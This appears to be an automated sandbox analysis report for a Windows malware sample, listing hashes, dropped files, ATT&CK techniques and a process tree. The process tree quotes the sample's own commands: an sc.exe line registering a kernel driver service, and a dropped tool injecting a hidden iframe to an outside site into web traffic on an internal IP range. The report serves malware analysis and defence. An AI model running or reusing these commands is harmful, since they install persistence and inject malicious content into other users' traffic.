4232acfb5cb648aa98112472224380310428eb47d553e2c3beb538f42e49e215

General

Target

f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe
Size

179KB
MD5

f2278e965052d96535a62992e3ad6074
SHA1

55652fbaba6ec36cc4efe88e15ae07b091a8f195
SHA256

4232acfb5cb648aa98112472224380310428eb47d553e2c3beb538f42e49e215
SHA512

437736cf0561cbb4411a97684b32b149269d6a6872fabec80d2def06d1527bb3fbd898240c44a1f2a153ccac3e821e95a0667b3643d5d5364a72626f89fdacf6
SSDEEP

3072:B+Txy/bdnPJU0FEH2rjIYiWtK4h4URUSzYxfd1UQ0YKZVwlTylrDWIeqHa4OAb8C:g0RnP5EUj7iWM84UmSzwfd1wYKSqHz7p

Score

8^/10

persistence

Malware Config

Signatures

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\drivers\npf.sys	f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe

Executes dropped EXE 1 IoCs

pid	Process
2588	chdkk.exe

Loads dropped DLL 8 IoCs

pid	Process
2244	f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe
2244	f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe
2588	chdkk.exe
2588	chdkk.exe
2588	chdkk.exe
2588	chdkk.exe
2588	chdkk.exe
2588	chdkk.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\chdkk.exe	f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\WanPacket.dll	f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Packet.dll	f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\wpcap.dll	f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\npptools.dll	f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2624	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: LoadsDriver 13 IoCs

pid	Process
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found
472	Process not Found

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2244 wrote to memory of 2624	2244	f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe	28
PID 2244 wrote to memory of 2624	2244	f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe	28
PID 2244 wrote to memory of 2624	2244	f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe	28
PID 2244 wrote to memory of 2624	2244	f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe	28
PID 2244 wrote to memory of 2588	2244	f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe	30
PID 2244 wrote to memory of 2588	2244	f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe	30
PID 2244 wrote to memory of 2588	2244	f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe	30
PID 2244 wrote to memory of 2588	2244	f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe	30

C:\Users\Admin\AppData\Local\Temp\f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\f2278e965052d96535a62992e3ad6074_JaffaCakes118.exe"
1⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2244
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\system32\sc.exe" create npf binpath= C:\Windows\system32\drivers\npf.sys type= kernel start= demand
  2⤵
  - Launches sc.exe
  PID:2624
- C:\Windows\SysWOW64\chdkk.exe
  "C:\Windows\system32\chdkk.exe" -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<iframe src=http://ww.xnibi.com/index.gif width=10 height=1></iframe>"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2588

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

1

T1543

Windows Service

1

T1543.003

Privilege Escalation

Create or Modify System Process

1

T1543

Windows Service

1

T1543.003

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\Windows\SysWOW64\Packet.dll

Filesize
86KB

MD5
9062aeea8cbfc4f0780bbbefad7cebcb

SHA1
c4ad39ec51ad0e84fe58f62931d13cddfde3189e

SHA256
b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c

SHA512
60957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646

Download Submit
\Windows\SysWOW64\WanPacket.dll

Filesize
66KB

MD5
fdd104a9fd3427a1df37041fa947a041

SHA1
cca1881a3c02033008f78cc39b712b637c7f3e13

SHA256
384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a

SHA512
9dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7

Download Submit
\Windows\SysWOW64\chdkk.exe

Filesize
13KB

MD5
ca42539e85a7f9bb372da8124f7a3254

SHA1
94ada2eaf210d3669b9d6873a5463eda6207a12a

SHA256
1a40928fca630e735dac69a800d707b67ed2d05740a0b869f438d1ad8245607f

SHA512
4e5a897c9d45611ed9b49185819772a6e08342a2449c9d213be90a37a02cd4004e7728cf131db50e82c696210e51752491ce11ca92528c5a1f5a5b2fde3d0017

Download Submit
\Windows\SysWOW64\drivers\npf.sys

Filesize
41KB

MD5
b15e0180c43d8b5219196d76878cc2dd

SHA1
33e676b37a3380de32c10ba5bc9170997445d314

SHA256
a4a102aab8f91a5b452ae2c9a40f5ebc07bc62af892af57d6e3ad1f4340486ab

SHA512
47e0e66e89ad11506aff709e7cd5817f5b68bafd5fbc4cc4f4ba5b82b1845977023c90273c58d580266fc8fdcb7fd230ade9c31a8dcc8b9b6ca146423e848a09

Download Submit
\Windows\SysWOW64\npptools.dll

Filesize
48KB

MD5
38e7f4e56118d91df929dba40035c017

SHA1
a6fe6350e19622fd60561547a6a6882bdc52bfb7

SHA256
281908702a725158d3bab00e7adb50069b1035f1bc5562b196c6bd6c49518361

SHA512
c4fa93e6760ce1083afbc0a97cd2a3cbece441acd426da547576d5f8c398554e90f3f89a78cedf5d87233e2de8487b8a6779fcf6346920ba873f4923af9324a4

Download Submit
\Windows\SysWOW64\wpcap.dll

Filesize
234KB

MD5
ce842d25e5b7e6ff21a86cad9195fbe8

SHA1
d762270be089a89266b012351b52c595e260b59b

SHA256
7e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3

SHA512
84c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6

Download Submit
memory/2244-1-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2244-15-0x0000000000400000-0x00000000004B5000-memory.dmp

Filesize
724KB

Download
memory/2244-0-0x0000000000400000-0x00000000004B5000-memory.dmp

Filesize
724KB

Download
memory/2588-17-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/2588-25-0x0000000000030000-0x0000000000040000-memory.dmp

Filesize
64KB

Download
memory/2588-22-0x0000000000220000-0x0000000000235000-memory.dmp

Filesize
84KB

Download
memory/2588-32-0x00000000002D0000-0x00000000002D9000-memory.dmp

Filesize
36KB

Download
memory/2588-31-0x00000000002D0000-0x00000000002D9000-memory.dmp

Filesize
36KB

Download
memory/2588-33-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2588-34-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download

Analysis

Sharing